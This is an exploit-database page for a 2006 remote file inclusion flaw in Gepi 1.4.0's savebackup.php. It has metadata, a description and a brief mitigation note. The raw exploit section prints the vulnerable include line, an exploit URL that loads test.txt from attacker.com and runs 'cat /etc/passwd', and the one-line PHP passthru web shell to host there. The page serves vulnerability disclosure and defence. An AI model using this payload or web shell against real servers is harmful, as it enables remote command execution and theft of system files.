header-logo
Suggest Exploit
vendor:
Gepi
by:
$um$id
9
CVSS
HIGH
System Access
20
CWE
Product Name: Gepi
Affected Version From: 1.4.0
Affected Version To: 1.4.0
Patch Exists: YES
Related CWE: N/A
CPE: a:adullact:gepi:1.4.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

gepi 1.4.0

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'filename' parameter to the 'savebackup.php' script. This can be exploited to include arbitrary files from remote hosts and execute arbitrary PHP code. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. The code in the test.txt file contains a passthru command which can be used to execute arbitrary commands on the vulnerable system.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

Package:- gepi 1.4.0
http://adullact.net/frs/download.php/992/gepi-1.4.0.tar.gz

impact:- highly critical ..System Access..
vulnerable code:-
      include($_GET['filename']);
in gepi/gestion/savebackup.php

Exploit:-
http://localhost/gepi/gestion/savebackup.php?filename=http://attacker.com/test.txt&cmd=cat
/etc/passwd

in test.txt
<? passthru("$_GET[cmd]");?>

Credits:-
$um$id

# milw0rm.com [2006-10-31]

Navigation

Suggest Exploit

Services By CQR